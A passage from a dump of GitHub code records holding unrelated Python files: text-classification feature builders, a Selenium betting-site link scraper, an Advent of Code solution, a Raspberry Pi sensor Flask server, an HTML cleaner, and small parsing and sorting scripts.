np\nimport pandas as pd\nimport sys\nimport pickle\n\nfrom utilitarianism import Progresser, QuickDataFrame\n\n\ndef tokenise(qstn):\n for ch in [':', ';', ',', '?', '!', '\\'', '\\\"', '\\\\', '/', '(', ')', '[', ']', '…', '...', '–', '-', '<', '>', '؟',\n '،', '.', '­', '«', '»', '_', '+', '=', ]:\n qstn = qstn.replace(ch, ' ')\n # TODO: use a better method\n return qstn.split()\n\n\ndef concat_word2vec_subjs():\n w2v = pd.read_csv('questions-word2vec.txt', header=None)\n questions = pd.read_csv('result_filtered.csv', delimiter=';')\n subjs = pd.read_csv('./combining_tags_data/subjs-result.csv', delimiter=';')\n trn = pd.DataFrame()\n for i, subj in subjs.iterrows():\n trn['sub' + str(subj['id'])] = 0\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, subj in subjs.iterrows():\n sub_id = str(subj['id'])\n trn.loc[i, 'sub' + sub_id] = 0\n if qrow['subject1'] == subj['tag'] or qrow['subject2'] == subj['tag'] 
or qrow['subject3'] == subj['tag']:\n trn.loc[i, 'sub' + sub_id] = 1\n # print i, '----',trn.loc[i]\n\n result = pd.concat([trn, w2v], axis=1)\n result.to_csv('subj-word2vec.csv', index=False, header=None)\n\n\ndef concat_word2vec_types():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n w2v = pd.read_csv('./Primary_data/questions-word2vec.txt', header=None)\n types = pd.read_csv('./combining_tags_data/types-result.csv', delimiter=';')\n\n # creating dataframe\n train = pd.DataFrame(dtype=object)\n for i, typ in types.iterrows():\n train['typ' + str(typ['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, typ in types.iterrows():\n typ_id = str(typ['id'])\n train.loc[i, 'typ' + typ_id] = 0\n if qrow['type1'] == typ['tag'] or qrow['type2'] == typ['tag'] or qrow['type3'] == typ['tag']:\n train.loc[i, 'typ' + typ_id] = 1\n\n result = pd.concat([train, w2v], axis=1)\n result.to_csv('type-word2vec.csv', index=False)\n\n\ndef create_1000word_vector():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n # questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n words_vector = pd.read_csv('./Primary_data/words_vector.csv')\n # first_rows = 2799\n\n # create dataframe\n train = pd.DataFrame(dtype=object)\n for wrd in words_vector['term'].as_matrix():\n train[wrd] = 0\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n train.loc[i, words_vector['term'][0]] = 0\n # set occurrence values\n for word in tokenise(qrow['sentence']):\n if word in train:\n train.loc[i, word] = 1\n\n # for i, qrow in questions_2.iterrows():\n # if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i + first_rows))\n # train.loc[i + first_rows, words_vector['term'][0]] = 0\n # # set occurrence values\n # for word in tokenise(str(qrow['content']) + ' ' + qrow['title']):\n # if word in train:\n # train.loc[i + first_rows, word] = 1\n\n print(train.shape)\n train = train.fillna(0)\n\n # rename columns\n number = 0\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n train = train.rename(columns={col: 'wrd' + str(number)})\n number += 1\n print(train.shape)\n train.to_csv('1000word_vector_Q.csv', index=False)\n\n\ndef create_clean_questions():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n # stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n with open('./Primary_data/questions.txt', 'w', encoding='utf-8') as outf:\n for i, qrow in questions.iterrows():\n outf.write(' '.join(tokenise(qrow['sentence'])) + '\\n')\n\n\ndef create_type_vector():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n types = pd.read_csv('./combining_tags_data/types-result.csv', delimiter=';')\n\n # creating dataframe\n train = pd.DataFrame(dtype=object)\n for i, typ in types.iterrows():\n train['typ' + str(typ['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, typ in types.iterrows():\n typ_id = str(typ['id'])\n train.loc[i, 'typ' + typ_id] = 0\n if qrow['type1'] == typ['tag'] or qrow['type2'] == typ['tag'] or qrow['type3'] == 
typ['tag']:\n train.loc[i, 'typ' + typ_id] = 1\n\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n\n train.to_csv('./Primary_data/type_vector_Q.csv', index=False)\n\n\ndef create_topic_vector():\n questions = pd.read_csv('result_filtered.csv', delimiter=';')\n # questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n topics = pd.read_csv('./Porsak_data/topic_list.csv')\n # first_rows = 2799\n\n # creating dataframe\n topic_id = dict()\n train = pd.DataFrame(dtype=object)\n for i, tpc in topics.iterrows():\n topic_id[tpc['topic']] = 'tpc' + str(tpc['id'])\n train['tpc' + str(tpc['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n\n # set occurrence of the topics\n for j, tpc in topics.iterrows():\n train.loc[i, 'tpc' + str(tpc['id'])] = 0\n\n try:\n train.loc[i, topic_id[qrow['subject1']]] = 1\n train.loc[i, topic_id[qrow['subject2']]] = 1\n train.loc[i, topic_id[qrow['subject3']]] = 1\n except Exception as e:\n if str(e) != 'nan':\n print(e)\n\n # build the train data from second list of questions\n # for i, qrow in questions_2.iterrows():\n # if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # # set occurrence of the topics\n # for j, tpc in topics.iterrows():\n # col_name = 'tpc' + str(tpc['id'])\n # train.loc[i + first_rows, col_name] = 0\n # if qrow['topic'] == tpc['topic']:\n # train.loc[i + first_rows, col_name] = 1\n\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n\n train.to_csv('topic_vector_Q.csv', index=False)\n\n\ndef concat_1000vec_type_cat():\n wrd = pd.read_csv('./Primary_data/1000word_vector_Q.csv')\n subj = pd.read_csv('./Primary_data/topic_vector_Q.csv')\n # type = pd.read_csv('type_vector_Q.csv')\n # result = pd.concat([type, subj, wrd], axis=1)\n # result = pd.concat([type, wrd], axis=1)\n result = pd.concat([subj, wrd], axis=1)\n result.to_csv('./Primary_data/arff/13_tpc;wrd.arff', index=False)\n\n\ndef concat_all():\n bow = pd.read_csv('./Primary_data/1000word_vector_Q.csv')\n w2v = pd.read_csv('./Primary_data/w2v-100_vector_Q.csv')\n typ = pd.read_csv('./Primary_data/type_vector_Q.csv')\n tpc = pd.read_csv('./Primary_data/topic_vector_Q.csv')\n\n result = pd.concat([typ, bow], axis=1)\n result.to_csv('./Primary_data/arff/1_typ;bow.arff', index=False)\n\n result = pd.concat([typ, w2v], axis=1)\n result.to_csv('./Primary_data/arff/2_typ;w2v.arff', index=False)\n\n result = pd.concat([typ, tpc, bow], axis=1)\n result.to_csv('./Primary_data/arff/3_typ;tpc,bow.arff', index=False)\n\n result = pd.concat([tpc, bow], axis=1)\n result.to_csv('./Primary_data/arff/4_tpc;bow.arff', index=False)\n\n result = pd.concat([tpc, w2v], axis=1)\n result.to_csv('./Primary_data/arff/5_tpc;w2v.arff', index=False)\n\n\ndef create_arff_header():\n header = '@relation \\'CQA\\'\\n\\n'\n # for i in range(0, 12):\n # header += '@attribute typ' + str(i) + ' {0,1}\\n'\n for i in range(0, 26):\n header += '@attribute tpc' + str(i) + ' {0,1}\\n'\n for i in range(0, 100):\n header += '@attribute wrd' + str(i) + ' numeric\\n'\n # for i in range(0, 1000):\n # header += '@attribute wrd' + str(i) + ' {0,1}\\n'\n header += '\\n@data\\n'\n print(header)\n\n\ndef save_topic_list():\n topics = dict()\n questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n for i, qrow in questions_2.iterrows():\n topics[qrow['topicid']] = qrow['topic']\n 
df = pd.DataFrame(topics.items(), columns={'id', 'topic'})\n df.to_csv('./Porsak_data/topic_list.csv', columns={'topic', 'id'}, index=False)\n\n\ndef read_w2v_data():\n w2v = dict()\n # with open('./word2vec/IRBlog/blog.fa.text.300.vec', 'r', encoding='utf-8') as infile:\n with open('./word2vec/Mixed/twitt_wiki_ham_blog.fa.text.100.vec', 'r', encoding='utf-8') as infile:\n first_line = True\n for line in infile:\n if first_line:\n first_line = False\n continue\n tokens = line.split()\n w2v[tokens[0]] = [float(el) for el in tokens[1:]]\n if len(w2v[tokens[0]]) != 300: # 100:\n print('Bad line!')\n\n # with open('./word2vec/IRBlog/w2v_per_300.pkl', 'wb') as outfile:\n with open('./word2vec/Mixed/w2v_per.pkl', 'wb') as outfile:\n pickle.dump(w2v, outfile)\n\n\ndef create_w2v_vectors():\n # with open('./word2vec/IRBlog/w2v_per_300.pkl', 'rb') as infile:\n with open('./word2vec/Mixed/w2v_per.pkl', 'rb') as infile:\n w2v = pickle.load(infile)\n w2v_length = 100 # 300\n stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n\n train = QuickDataFrame(['w' + str(i) for i in range(0, w2v_length)])\n\n prog = Progresser(questions.shape[0])\n # build the train data\n for i, qrow in questions.iterrows():\n prog.count()\n sum_array = np.zeros(w2v_length)\n number_of_words = 0\n\n for word in tokenise(qrow['sentence']):\n if word not in stop_words and word in w2v:\n number_of_words += 1\n sum_array += w2v[word]\n if i != len(train):\n print('wat?!!')\n train.append(list(sum_array / number_of_words))\n\n train.to_csv('./Primary_data/w2v-100_vector_Q.csv')\n # train.to_csv('./Primary_data/w2v-300_vector_Q.csv')\n\n\ndef create_sentence_files():\n stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n questions = QuickDataFrame.read_csv('./Primary_data/result_filtered.csv', sep=';')\n topics = QuickDataFrame.read_csv('./Primary_data/topic_vector_Q.csv')\n\n files = dict()\n for tpc in topics.cols:\n files[tpc + '-p'] = open('./Primary_data/sent_topic/' + tpc + '.p', 'w', encoding='utf-8')\n files[tpc + '-n'] = open('./Primary_data/sent_topic/' + tpc + '.n', 'w', encoding='utf-8')\n\n prog = Progresser(len(questions['sentence']))\n # build the train data\n for i, qrow in enumerate(questions['sentence']):\n prog.count()\n snt = []\n for word in tokenise(qrow):\n if word not in stop_words:\n snt.append(word)\n snt = ' '.join(snt)\n for tpc in topics.cols:\n if topics[tpc][i] == '0':\n files[tpc + '-n'].write(snt + '\\n')\n elif topics[tpc][i] == '1':\n files[tpc + '-p'].write(snt + '\\n')\n else:\n print(\"wattt\")\n\n for fl in files.values():\n fl.close()\n\n\ndef create_word_to_index():\n questions = pd.read_csv('./Primary_data/questions.txt', delimiter=';', header=None)[0].values\n w2i = {}\n for q in questions:\n for word in q.split():\n try:\n w2i[word] += 1\n except:\n w2i[word] = 1\n w2i_sorted = sorted(w2i.items(), key=lambda tup: tup[1],reverse=True)\n with open('./Primary_data/word_to_index.csv', 'w', encoding='utf-8') as outf:\n for i, w in enumerate(w2i_sorted):\n outf.write(w[0] + ',' + str(i+1) + '\\n')\n\n\n# create_arff_header()\n# concat_word2vec_subjs()\n# concat_word2vec_types()\n\n# create_1000word_vector()\n# create_type_vector()\n# create_topic_vector()\n# concat_1000vec_type_cat()\n# concat_all()\n\n# save_topic_list()\n\n# read_w2v_data()\n# create_w2v_vectors()\n\n# create_sentence_files()\n# 
create_clean_questions()\ncreate_word_to_index()\n","repo_name":"AmirAhmadHabibi/TheSuperQuestionTypeTopicClassifier","sub_path":"training_data_builder.py","file_name":"training_data_builder.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"7047099036","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.firefox.options import Options\n\n# hiding browser\noptions = webdriver.FirefoxOptions()\noptions.add_argument('-headless')\n\n# driver and url loading\ngeckodriver = 'D:\\Python\\geckodriver.exe'\ndriver = webdriver.Firefox(executable_path=geckodriver, options=options)\nlinks = []\nurls = ['https://www.betexplorer.com/next/soccer/','https://www.betexplorer.com/next/hockey/']\n\n# time to compare\nt = time.localtime()\ncurrent_time = time.strftime(\"%H:%M\", t)\n\nurl_dict = {}\nfor url in urls:\n driver.get(url)\n # scraping match links from url\n elements = driver.find_elements_by_class_name(\"table-main__tt [href]\")\n dates = driver.find_elements_by_class_name(\"table-main__time\")\n\n for date, element in zip(dates, elements):\n key = date.text\n if key > current_time:\n url_dict.setdefault(key, [])\n url_dict[key].append(element.get_attribute('href'))\n\n for links_list in url_dict.values():\n #print(links)\n for link in links_list:\n links.append(link)\n\n \"\"\"\n links_subpage = [link.get_attribute('href') for link in elements]\n for link in links_subpage:\n links.append(link)\n\n #links = (link for link in links_subpage)\n \"\"\"\n\nprint(\"links scrapped\")\ndriver.quit()\n\n\n\"\"\"\ndef execute(links):\n for link in links:\n driver = load_driver(link)\n match = get_match(driver)\n date = get_date(driver)\n if not odds_exist_check(driver)\n continue\n rows = get_rows(driver)\n cells = get_cells(driver)\n rows = row_truncate(rows)\n cells = fix_cell_list(cells)\n odds_objects = store_in_class(rows, cells, dictionary_home, dictionary_draw, dictionary_away)\n sort_by_odds(dictionary)\n get_best_odd(dictionary)\n Mecz = BestBet(match, date, get_best_odd(dictionary_home), ...)\n save_results(file, Mecz)\n \n \n\"\"\"","repo_name":"Kuba799/Data-Scraper","sub_path":"link_scraper.py","file_name":"link_scraper.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42789637444","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nfrom common.Puzzle import Puzzle\n\nclass Puzzle04(Puzzle, year=2022, day=4):\n @staticmethod\n def process_input(data):\n return [(tuple(map(int, assignments[0].split('-'))), tuple(map(int, assignments[1].split('-')))) for assignments in [pair.split(',') for pair in data]]\n\n def solve_part_1(self): # Solution for part 1\n res = 0\n for pair in self.data:\n ar = tuple(range(pair[0][0], pair[0][1]+1))\n br = tuple(range(pair[1][0], pair[1][1]+1))\n if(ar[0] <= br[0] and ar[-1] >= br[-1]):\n res += 1\n continue\n if(br[0] <= ar[0] and br[-1] >= ar[-1]):\n res += 1\n continue\n return res\n\n def solve_part_2(self): # Solution for part 2\n res = 0\n for pair in self.data:\n br = tuple(range(pair[1][0], pair[1][1]+1))\n for a in range(pair[0][0], pair[0][1]+1):\n if(a in br):\n res += 1\n break\n return res\n\nif(__name__ == \"__main__\"):\n puzzle = Puzzle04()\n part1, part2 = puzzle.solve()\n print(f\"Advent of Code {puzzle.year} day {puzzle.day}:\")\n print(f\"- Part 1: {part1}\")\n 
print(f\"- Part 2: {part2}\")\n","repo_name":"Skulhunter5/advent-of-code","sub_path":"Python/2022/puzzle04.py","file_name":"puzzle04.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16884867503","text":"from flask import Flask, render_template, request\nfrom gevent.wsgi import WSGIServer\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nimport id_generation\nimport requests\nimport json\nimport time\n\nWEB_SERVER_IP = \"127.0.0.1\"\nWEB_SERVER_PORT = 8080\nINITIAL_PEER_IP = \"127.0.0.1\"\nINITIAL_PEER_PORT = 5000\n\n# in Board mode\nLED_PIN = 7\nMOTION_PIN = 11\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef render_root():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n nearby = bool(GPIO.input(MOTION_PIN))\n return render_template(\"index.html\", temperature=temperature,\n humidity=humidity,\n nearby=nearby)\n\n\n@app.route(\"/pi/sensors/temperature/0/\")\ndef get_temperature():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n return json.dumps([time.time(), temperature])\n\n\n@app.route(\"/pi/sensors/humidity/0/\")\ndef get_humidity():\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, 12)\n return json.dumps([time.time(), humidity])\n\n\n@app.route(\"/pi/sensors/motion/0/\")\ndef get_motion():\n return json.dumps([time.time(), GPIO.input(MOTION_PIN)])\n\n\n@app.route(\"/pi/actuators/leds/0/\", methods=[\"POST\"])\ndef handle_led_set_value():\n value = GPIO.LOW if request.form[\"value\"] == \"0\" else GPIO.HIGH\n GPIO.output(LED_PIN, value)\n return \"OK\"\n\n\ndef connect_sensor_to_kademlia(sensor_url, description):\n sensor_id = id_generation.generate_id(sensor_url)\n headers = {\"node_id\": str(sensor_id), \"url\": sensor_url, \"description\": description}\n url = \"http://%s:%d/api/wotds/registration/\" % (INITIAL_PEER_IP, INITIAL_PEER_PORT)\n requests.get(url, headers=headers)\n\n\ndef connect_sensors_to_kademlia():\n my_url = \"http://%s:%d\" % (WEB_SERVER_IP, WEB_SERVER_PORT)\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/humidity/0/\", \"Humidity Sensor\")\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/temperature/0/\", \"Temperature Sensor\")\n connect_sensor_to_kademlia(my_url + \"/pi/sensors/motion/0/\", \"Motion Sensor\")\n\n\ndef main():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(MOTION_PIN, GPIO.IN)\n GPIO.setup(LED_PIN, GPIO.OUT)\n\n connect_sensors_to_kademlia()\n\n http_server = WSGIServer(('', WEB_SERVER_PORT), app)\n http_server.serve_forever()\n\n # app.run(host=\"0.0.0.0\", port=WEB_SERVER_PORT, threaded=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"steffen555/dBIoTP2PC","sub_path":"milestone4/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17234513533","text":"# -*- coding: utf-8 -*-\nfrom urlparse import urlsplit\nfrom lxml.html import tostring, fromstring, HTMLParser\nfrom lxml.html.clean import Cleaner\n\n\ndef html_link(url):\n host = urlsplit(url).hostname\n return u'<a href=\"%s\">%s</a>' % (url, host)\n\n\ndef render_html(node, encoding='utf-8', make_unicode=False):\n \"\"\"\n Render Element node.\n \"\"\"\n if make_unicode or encoding == 'unicode':\n return tostring(node, encoding='utf-8').decode('utf-8')\n else:\n return tostring(node, encoding=encoding)\n\n\ndef parse_html(html, 
encoding='utf-8'):\n \"\"\"\n Parse html into ElementTree node.\n \"\"\"\n parser = HTMLParser(encoding=encoding)\n return fromstring(html, parser=parser)\n\n\ndef clean_html(html, safe_attrs=('src', 'href'), encoding='utf-8'):\n \"\"\"\n Fix HTML structure and remove non-allowed attributes from all tags.\n Return UTF-8 HTML.\n \"\"\"\n\n # Conver HTML to Unicode\n html = render_html(parse_html(html, encoding=encoding), make_unicode=True)\n\n # Strip some shit with default lxml tools\n cleaner = Cleaner(page_structure=True)\n html = cleaner.clean_html(html)\n\n # Keep only allowed attributes\n tree = parse_html(html)\n for elem in tree.xpath('.//*'):\n for key in elem.attrib.keys():\n if key not in safe_attrs:\n del elem.attrib[key]\n\n return render_html(tree)\n","repo_name":"indexofire/gork","sub_path":"src/gork/application/feedz/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37866749146","text":"class Team:\r\n def __init__(self,ma,tenTeam,tenTruong):\r\n self.ma=ma\r\n self.tenTeam=tenTeam\r\n self.tenTruong=tenTruong\r\n\r\nclass ThiSinh:\r\n def __init__(self,ma,ten,team: Team):\r\n self.ma=ma\r\n self.ten=ten\r\n self.team=team\r\n def __str__(self):\r\n return self.ma+' '+self.ten+' '+self.team.tenTeam+' '+self.team.tenTruong\r\na=[]\r\nd={}\r\nfor i in range(int(input())):\r\n ma=\"Team%02d\"%(i+1)\r\n tenTeam=input()\r\n tenTruong=input()\r\n d[ma]=Team(ma,tenTeam,tenTruong)\r\nfor i in range(int(input())):\r\n ma=\"C%03d\"%(i+1)\r\n ten=input()\r\n maTeam=input()\r\n ts=ThiSinh(ma,ten,d[maTeam])\r\n a.append(ts)\r\na.sort(key=lambda x: x.ten)\r\nfor i in a:\r\n print(i)\r\n\r\n'''\r\n2\r\nBAV_MIS\r\nBanking Academy of Vietnam\r\nFTU Knights1\r\nForeign Trade University\r\n6\r\nLe Trung Toan\r\nTeam01\r\nNguyen Trinh Quoc Long\r\nTeam01\r\nGiang Minh Tung\r\nTeam01\r\nNguyen Hang Giang\r\nTeam02\r\nNguyen Thanh Nhan\r\nTeam02\r\nNguyen Viet Duc\r\nTeam02\r\n'''","repo_name":"Nauh24/Python_PTIT","sub_path":"PYKT096-DANH SÁCH THI LẬP TRÌNH.py","file_name":"PYKT096-DANH SÁCH THI LẬP TRÌNH.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"43174858719","text":"#!/usr/bin/python\n\nimport csv\nimport sys\nimport re\nimport fileinput\n\nre_0 = re.compile(r'^(...)(.*)$')\nre_10 = re.compile(r'^([^ ]+) +(.*)$')\nre_11 = re.compile(r'^([^ ]+) +([^ ]+) +(.+), +(.*)$')\nre_20 = re.compile(r'^(.*)$')\nre_21 = re.compile(r'^([^ ]+) +(.+), +(.*)$')\n\ndef parse(fn, wr):\n f=open(fn,'r')\n lines=[x.strip('\\n') for x in f.readlines()]\n empty4=(\"\",\"\",\"\",\"\")\n empty3=(\"\",\"\",\"\")\n l1 = empty4\n l2 = empty4\n l3 = empty4\n state = 0\n d1 = \"\"\n d2 = \"\"\n d3 = \"\"\n i = 0\n n = 0\n rows = []\n while i < len(lines):\n m = re_0.match(lines[i])\n if m is not None:\n if m.group(1) == '###':\n state = 1\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l1 = (mmm.group(1), mmm.group(2), mmm.group(3), mmm.group(4))\n else:\n l1 = (mm.group(1), mm.group(2), \"\", \"\")\n l2 = empty4\n l3 = empty4\n d2 = \"\"\n d3 = \"\"\n else:\n print(\"!!# Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '@@@':\n state = 2\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l2 = (mmm.group(1), mmm.group(2), mmm.group(3), 
mmm.group(4))\n else:\n l2 = (mm.group(1), mm.group(2), \"\", \"\")\n l3 = empty4\n d3 = \"\"\n else:\n print(\"!!@ Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '$$$':\n state = 3\n mm = re_10.match(m.group(2))\n if mm is not None:\n mmm = re_11.match(m.group(2))\n if mmm is not None:\n l3 = (mmm.group(1), mmm.group(2), mmm.group(3), mmm.group(4))\n else:\n l3 = (mm.group(1), mm.group(2), \"\", \"\")\n else:\n print(\"!!$ Not match [%d] %s\" % (i, lines[i]))\n return None\n elif m.group(1) == '===':\n state = 4\n mm = re_20.match(m.group(2))\n if mm is not None:\n mmm = re_21.match(m.group(2))\n if mmm is not None:\n l4 = (mmm.group(1), mmm.group(2), mmm.group(3))\n else:\n l4 = (mm.group(1), \"\", \"\")\n else:\n print(\"!!= Not match [%d] %s\" % (i, lines[i]))\n return None\n i = i+1\n n = n+1\n row = [n, l1[0], l1[1], l1[2], l1[3], d1, l2[0], l2[1], l2[2], l2[3], d2, l3[0], l3[1], l3[2], l3[3], d3, l4[0], l4[1], l4[2], lines[i]]\n wr.writerow(row)\n else:\n if state == 1:\n d1 = d1 + lines[i] + \"\\n\"\n elif state == 2:\n d2 = d2 + lines[i] + \"\\n\"\n elif state == 3:\n d3 = d3 + lines[i] + \"\\n\"\n i = i+1\n##\nwith open('%s.csv' % sys.argv[1], 'w') as cf:\n writer = csv.writer(cf, delimiter=',', quoting=csv.QUOTE_ALL)\n title = [\"count\", \"rank-1 label\", \"rank-1 name\", \"rank-1 author\", \"rank-1 date\", \"rank-1 description\",\n \"rank-2 label\", \"rank-2 name\", \"rank-2 author\", \"rank-2 date\", \"rank-2 description\",\n \"rank-3 label\", \"rank-3 name\", \"rank-3 author\", \"rank-3 date\", \"rank-3 description\", \n \"rank-4 name\", \"rank-4 author\", \"rank-4 date\", \"rank-4 description\"]\n writer.writerow(title)\n parse(sys.argv[1], writer)\n","repo_name":"ChangLiuGitHub/Practice-of-Classification-models-on-TIP-data","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15615459018","text":"import sys\n\nclass RegistrarUsuario:\n\n\t#### Duda: Iniciar Registro de Usuarios aca, dentro de esta clase\n\tdef agregarUsuario(self, Usuario, RegistroUsuarios):\n\t\trepetido = self.buscarUsuario(Usuario, RegistroUsuarios)\n\t\tif not repetido: \n\t\t\tRegistroUsuarios.append(Usuario)\n\t\telse: sys.stderr.write('Fallo agregarUsuario: El Usuario ya se encuentra registrado en el Sistema \\n')\n\n\tdef buscarUsuario(self, Usuario, RegistroUsuario):\n\t\tencontrado = False\n\t\tfor unUsuario in RegistroUsuario:\n\t\t\tif unUsuario.darNombre() == Usuario.darNombre() : \n\t\t\t\tencontrado = True\n\t\treturn encontrado\n","repo_name":"jnvillar/Ing-Tps","sub_path":"Tp1/source/Deprecated/RegistrarUsuario.py","file_name":"RegistrarUsuario.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71714255813","text":"import pandas as pd\nimport matplotlib as plt\nimport seaborn as sns\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC, LinearSVC\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n\n\n\ndef parse_data(file_path, venue):\n data = []\n with open(file_path, 'r') 
as f:\n for line in f:\n tokens = line.split(\"\\t\")\n data.append(dict(conference=venue,title=tokens[2].strip()))\n return data\n\ndef tokenize(title):\n tokeizer = RegexpTokenizer(r'[a-zA-Z]\\w+')\n return tokeizer.tokenize(title)\n\ndef stemmer(words):\n stemmer = PorterStemmer()\n return \" \".join(stemmer.stem(word) for word in words)\n\nif __name__ == '__main__':\n source_path = \"/mnt/3A0F13EC43ACDB83/workspace/dblp_outputs/\"\n datasets =[\"icse\",\"vldb\"]\n data = []\n for dataset in datasets:\n data.append(parse_data(source_path+dataset+\"_id.txt\",dataset))\n\n icse = pd.DataFrame(data[0])\n vldb = pd.DataFrame(data[1])\n\n icse['class_target']=0\n vldb['class_target']=1\n df_list = [icse,vldb]\n df = pd.concat(df_list).reset_index(drop=True)\n\n df['tokens'] = df['title'].map(tokenize)\n df['stems'] = df['tokens'].map(stemmer)\n\n # print(df.sample(10))\n x = df['stems']\n y = df['class_target']\n\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size =0.25, random_state=5)\n\n # print(len(X_train), len(X_test))\n # print(len(Y_train), len(Y_test))\n \n mnnb_pipe = Pipeline(steps=[('tf',TfidfVectorizer()),('mnnb',MultinomialNB())])\n mnnb_grid = {\n 'tf__max_features' :[2000,3000,5000],\n 'tf__stop_words' :['english'],\n 'tf__ngram_range':[(1,1),(1,2)],\n 'tf__use_idf' :[True,False],\n 'mnnb__alpha' :[0.1, 0.5, 1]\n }\n \n mnnb_gs = GridSearchCV(mnnb_pipe, mnnb_grid, n_jobs=-1)\n mnnb_gs.fit(X_train, Y_train)\n\n # print(mnnb_gs.score(X_train, Y_train))\n # print(mnnb_gs.score(X_test, Y_test))\n # print(mnnb_gs.best_params_) #best parameters\n \n mnnb_pred = mnnb_gs.predict(X_test)\n # df['predicts'] = mnnb_pred\n # print(df.sample(30))\n\n mnnb_conf = confusion_matrix(Y_test,mnnb_pred)\n # print(\"MNNB Cnf []: \\n\",mnnb_conf)\n mnnb_heatmap = sns.heatmap(mnnb_conf, cmap=\"YlGnBu\", annot=True, square=True, fmt=\".0f\").get_figure()\n mnnb_heatmap.savefig('mnnb_heatmap.png',dpi=400)\n \n print(classification_report(Y_test,mnnb_pred))\n\n svc_pipe = Pipeline(steps=[('tf',TfidfVectorizer()),('svc',SVC())])\n svc_grid = {\n 'tf__max_features' :[2000,3000,5000],\n 'tf__stop_words' :['english'],\n 'tf__ngram_range':[(1,1),(1,2)],\n 'tf__use_idf' :[True,False],\n 'svc__C' :[3,5],\n 'svc__tol' :[1e-3,1e-5],\n 'svc__class_weight':[{0:0.05,1:0.8},{0:0.07,1:1}]\n }\n \n svc_gs = GridSearchCV(svc_pipe, svc_grid, n_jobs=-1)\n svc_gs.fit(X_train, Y_train)\n # print(\"Best svc params:\\n\",svc_gs.best_params_)\n svc_pred = svc_gs.predict(X_test)\n svc_conf = confusion_matrix(Y_test,svc_pred)\n svc_heatmap = sns.heatmap(svc_conf, cmap=\"YlGnBu\", annot=True, square=True, fmt=\".0f\").get_figure()\n 